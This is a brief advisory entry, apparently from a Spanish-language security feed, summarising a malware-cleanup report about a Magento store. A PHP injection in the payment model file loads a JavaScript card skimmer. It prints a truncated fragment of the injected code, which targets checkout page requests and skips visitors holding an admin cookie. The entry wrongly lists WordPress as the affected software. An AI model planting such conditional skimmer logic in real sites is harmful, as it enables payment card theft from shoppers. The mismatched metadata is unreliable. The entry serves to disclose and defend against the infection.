Magento PHP Injection Loads JavaScript Skimmer
|
Información sobre el sistema
|
|
|
Software afectado |
Wordpress |
Descripción
|
A Magento website owner was concerned about malware and reached out to our team for assistance. Upon investigation, we found the website contained a PHP injection in one of the Magento files: ./app/code/core/Mage/Payment/Model/Method/Cc.php … if ($_SERVER[“REQUEST_METHOD”] === “GET”){ if (strpos($_SERVER[“REQUEST_URI”], “/onestepcheckout/index/”) !== false){ if(!isset($_COOKIE[“adminhtml”])){ echo
More info:
http://feedproxy.google.com/~r/sucuri/blog/~3/pp87qW5hBU0/magento-php-injection-loads-javascript-skimmer.html |
Identificadores estándar
|
Propiedad |
Valor |
CVE |
|